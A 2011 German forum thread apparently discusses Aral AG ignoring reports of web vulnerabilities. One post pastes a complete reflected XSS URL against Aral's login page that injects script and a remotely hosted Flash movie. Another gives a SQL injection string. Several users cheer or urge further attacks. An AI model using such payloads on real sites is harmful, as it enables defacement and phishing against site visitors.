Die Aral AG ignoriert sämtliche Sicherheitshinweise: Wann erfolgt der Hack?

**Ghandy** · 25. 07. 2011, 10:13

Die Aral AG ignoriert seit Monaten die kritischen Sicherheitslücken auf ihrer Webseite. Die Kollegen von "Sicherheit Online" haben mehrfach versucht, per E-Mail oder telefonisch auf den Bug aufmerksam zu machen. Das Problem wird aber komplett ausgeschwiegen. Auch der Pressesprecher möchte dazu bislang nichts sagen. Fragt sich nur, wie lange der Deface noch auf sich warten lässt. Wir sind gespannt.

zur News

**DukeMan999** · 25. 07. 2011, 10:15

Veröffentlicht doch direkt den exploid link

vill wird dann reagiert...

Mfg
DukeMan

**FlySoft** · 25. 07. 2011, 10:23

Sie sprachen von mehreren, greavierenden Lücken...

Warscheinlich gibts demnächst mal wieder ' or 1=1; ---# for the lulz

Wär typisch

Warum sind die eig. zu doof um $mail = htmlentities(mysql_real_escape_string($_GET["emailId"])) zu schreiben? Das wärs ja schon. So einfach, und doch zu doof -.-'

**HerrMaulwurf** · 25. 07. 2011, 10:24

Und wenn dann gehackt wird heulen die wieder rum. Ich sag nur selber schuld, ich hab da kein Erbarmen

**Ghandy** · 25. 07. 2011, 10:32

Echt ich verstehe so etwas nicht. Man bekommt von Leuten mehrfach einen Sicherheitshinweis, wird angerufen und reagiert darauf einfach nicht. Das kann doch nicht so schwer (oder unwichtig) sein.

**G0l3m** · 25. 07. 2011, 10:35

Geil jetzt läuft das Super Mario Intro in Endlosschleife im Hintergrund. Dömdörööm dumdumdubum...

**Anonym082000** · 25. 07. 2011, 10:51

scheint gefixt worden zu sein.
Oder mein Noskript hat es verhindert

Zitat von War-10-ck

Vielleicht fehlt es schlichtweg an Konsequenzen für die Unternehmen, sie sind ja nicht die Geschädigten, vielmehr ihre Kunden.

Stimmt besser wäre es die Datenbank komplett zu löschen und einen Hinweis für die Kunden dazulassen, dann merkt es jeder der sich dort regelmäßig anmeldet und die Datensätze sind sicher.Aral hätte dann das Problem und nicht die Kunden

**War-10-ck** · 25. 07. 2011, 10:56

Wann endlich begrift man endlich, dass die Sicherheit der Besucher unbezahlbar ist?

endlich, endlich

Das es überhaupt noch gemeldet wird sollte einen doch wundern, dann bekommen Unternehmen sogar noch gratis Hinweise auf Sicherheitsmängel und ignorieren diese dann? Da fällt einem nichts mehr zu ein als: Dumm!

Vielleicht fehlt es schlichtweg an Konsequenzen für die Unternehmen, sie sind ja nicht die Geschädigten, vielmehr ihre Kunden.

War10ck

**Nitschiwo** · 25. 07. 2011, 11:18

Wenns so weit ist, bitte beim Sprittpreis das Komma eine Stelle nach links verschieben.

**Khargoth** · 25. 07. 2011, 11:22

Zitat von Anonym082000

scheint gefixt worden zu sein.
Oder mein Noskript hat es verhindert

nix gefixt, war dein noscript

**rootbox** · 25. 07. 2011, 11:23

ich bleib wieder leer aus

ps bei opera in der neusten version gehts
und chrome zeigt bei mir alles außer des flash.. vll nicht installiert ka

Code:

[NoScript XSS] Eine verdächtige Anfrage wurde bereinigt. Original-URL [http://www.aral.de/aral/loginaction.do?serviceLevel=2&categoryId=5005&emailId=%22%3E%3Cscript%3Ealert%28%27Hopp...ne%20Runde%20Super%20Mario!%27%29%3C%2fscript%3E%3Cobject%20height%3D%22315%22%20width%3D%22420%22%20align%3D%22middle%22%20classid%3D%22clsid%3Ad27cdb6e-ae6d-11cf-96b8-444553540000%22%20codebase%3D%22http%3A%2f%2ffpdownload.macromedia.com%2fpub%2fshockwave%2fcabs%2fflash%2fswflash.cab%23version%3D8%2C0%2C0%2C0%22%20id%3D%22SMF_v3.0%22%3E%0A%0A%20%20%20%20%20%20%3Cparam%20name%3D%22allowScriptAccess%22%20value%3D%22sameDomain%22%3E%0A%20%20%20%20%20%20%3Cparam%20name%3D%22movie%22%20value%3D%22http%3A%2f%2fwww.pouetpu-games.com%2fXO8WS%2fSMF_v3.0.swf%22%3E%0A%20%20%20%20%20%20%3Cparam%20name%3D%22menu%22%20value%3D%22false%22%3E%0A%20%20%20%20%20%20%3Cparam%20name%3D%22quality%22%20value%3D%22high%22%3E%0A%20%20%20%20%20%20%3Cparam%20name%3D%22bgcolor%22%20value%3D%22%23000000%22%3E%0A%20%20%20%20%20%20%3Cembed%20height%3D%22315%22width%3D%22420%22%20align%3D%22middle%22%20src%3D%22http%3A%2f%2fwww.pouetpu-games.com%2fXO8WS%2fSMF_v3.0.swf%22%20menu%3D%22false%22%20quality%3D%22high%22%20bgcolor%3D%22%23000000%22%20name%3D%22JKSMF_v3.0%22%20allowscriptaccess%3D%22sameDomain%22%20type%3D%22application%2fx-shockwave-flash%22%20pluginspage%3D%22http%3A%2f%2fwww.macromedia.com%2fgo%2fgetflashplayer%22%3E%0A%20%20%20%20%3C%2fobject%3E%0A%20%20%20%20%3C%2fembed%3E%3Cbr%20%2f%3E%3Cbr%20%2f%3EScheinbar%20legt%20Aral%20keinen%20Wert%20auf%20die%20Sicherheit%20der%20Besucher...%3Cbr%20%2f%3E%20Mehr%20Informationen%20-%20%3Ca%20href%3D%22http%3A%2f%2fwww.sicherheit-online.org%2fAktuelle-Themen%2fAral-AG-ignoriert-kritische-Sicherheitslucke.html%22%3EKlick!%3C%2fa%3E%3Cbr%20%2f%3E%3Cbr%20%2f%3E%3Cinput] angefordert von [chrome://browser/content/browser.xul]. Bereinigte URL: [http://xss:xss@www.aral.de/aral/loginaction.do?serviceLevel=2&categoryId=5005&emailId=%20%3E%20script%3EALERT%20%20Hopp...ne%20Runde%20Super%20Mario!%20%20%20%2Fscript%3E%20object%20height%20%20315%20width%20%20420%20align%20%20middle%20classid%20%20clsid%3Ad27cdb6e-ae6d-11cf-96b8-444553540000%20codebase%20%20http%3A%2F%2Ffpdownload.macromedia.com%2Fpub%2Fshockwave%2Fcabs%2Fflash%2Fswflash.cab%23version%208%2C0%2C0%2C0%20id%20%20SMF_v3.0%20%3E%20param%20NAME%20%20allowScriptAccess%20value%20%20sameDomain%20%3E%20param%20NAME%20%20movie%20value%20%20http%3A%2F%2Fwww.pouetpu-games.com%2FXO8WS%2FSMF_v3.0.swf%20%3E%20param%20NAME%20%20menu%20value%20%20false%20%3E%20param%20NAME%20%20quality%20value%20%20high%20%3E%20param%20NAME%20%20bgcolor%20value%20%20%23000000%20%3E%20embed%20height%20%20315%20width%20%20420%20align%20%20middle%20src%20%20http%3A%2F%2Fwww.pouetpu-games.com%2FXO8WS%2FSMF_v3.0.swf%20menu%20%20false%20quality%20%20high%20bgcolor%20%20%23000000%20NAME%20%20JKSMF_v3.0%20allowscriptaccess%20%20sameDomain%20type%20%20application%2Fx-shockwave-flash%20pluginspage%20%20http%3A%2F%2Fwww.macromedia.com%2Fgo%2Fgetflashplayer%20%3E%20%20%2Fobject%3E%20%20%2Fembed%3E%20br%20%2F%3E%20br%20%2F%3EScheinbar%20legt%20Aral%20keinen%20Wert%20auf%20die%20Sicherheit%20der%20Besucher...%20br%20%2F%3E%20Mehr%20Informationen%20-%20a%20href%20%20http%3A%2F%2Fwww.sicherheit-online.org%2FAktuelle-Themen%2FAral-AG-ignoriert-kritische-Sicherheitslucke.html%20%3EKlick!%20%2Fa%3E%20br%20%2F%3E%20br%20%2F%3E%20input#09192946619430686691].

Edit:

http://tinyurl.com/3l8es87

**Diablokiller999** · 25. 07. 2011, 13:02

Und damit bald wieder ein Beispiel für "Wer nicht hören will, muss fühlen".
Man kann sich schonmal vor die Glotze setzen und die ersten Meldungen im Ticker von N24/NTV oder so abwarten. Dann gibts ne PK auf der wieder auf die Hacker eingedroschen wird und man selbst ist das Unschuldslamm. Das aber jedes Skriptkiddie diese quasi nun offen liegenden Daten klauen kann, wird natürlich nicht erwähnt. Genauso wie die zig Warnungen die vorher kamen.

In meinem alten Unternehmen wäre ein solcher Umgang mit Datensätzen der Ruin gewesen, aber das waren auch Krankenkassendaten, die sind (noch) etwas wichtiger als ein paar Adressen ^^

DasFragezeichen · 25. 07. 2011, 13:09

Vermutlich war man zuvor mehr damit beschäftigt, wie man den Autofahrern das Geld aus der Tasche mit überhöhten Benzinpreisen zieht. Da bleibt für so Kleinigkeiten keine Zeit.

**Smarag** · 25. 07. 2011, 13:10

Warum dramatisiert ihr das ganze so xD? Ein "deface" oder ein eindringen in die Server/Datenbanken von Aral ist damit nicht möglich. Die Lücke ermöglicht bloß ziemlich leichtes phishing.

**DukeMan999** · 25. 07. 2011, 15:57

plattmachen alles plattmachen, meiner meinung nach...

**alter_Bekannter** · 25. 07. 2011, 16:11

Zitat von Ghandy

Echt ich verstehe so etwas nicht. Man bekommt von Leuten mehrfach einen Sicherheitshinweis, wird angerufen und reagiert darauf einfach nicht. Das kann doch nicht so schwer (oder unwichtig) sein.

Zumal das fixen gemeldeter Lücken oftmals den Schwierigkeitsgrad von "Malen nach Zahlen" hat...

@Smarag
Voll?
Phishing hat nichts mit Sicherheitslücken zu tun, das ist die reine Ausnutzung von Clientseitiger Dummheit. Deswegen steht überall: Ein Mitarbeiter von $Firma wird euch nie nach eurem Passwort fragen.

Equivalent zu:
Gib dein Passwort niemals woanders als auf unserer Homepage oder dem Gameclient ein.

Aber auch das hilft eben nicht gegen PEBKAC.

**MisterDaNS** · 25. 07. 2011, 20:04

Der Hack ist erfolgt

Hab ich eben gesehen

http://tinyurl.com/3vfgwj5

**Ghandy** · 25. 07. 2011, 20:30

Kann ich bestätigen.

**Gugel** · 25. 07. 2011, 20:39

Zitat von MisterDaNS

Der Hack ist erfolgt

Hab ich eben gesehen

http://tinyurl.com/3vfgwj5

Dies ist nicht der Hack, auf den du gewartet hast *Jedi-Handbewegung*

Das Gezeigte, ist ist nicht wirklich für mehr, als zum Lustigmachen, ausnutzbar. Wenn die aber auch sonst noch irgendwo das Escapen bei der Ausgabe vergessen, könnte es eventuell tatsächlich echte XSS-Möglichkeiten geben.
Viel gefährlicher ist, wenn sie vergessen haben, die Eingabe zu escapen. Dann könnte eine klassische SQL-Injection eventuell die Datenbank präsentieren oder ändern...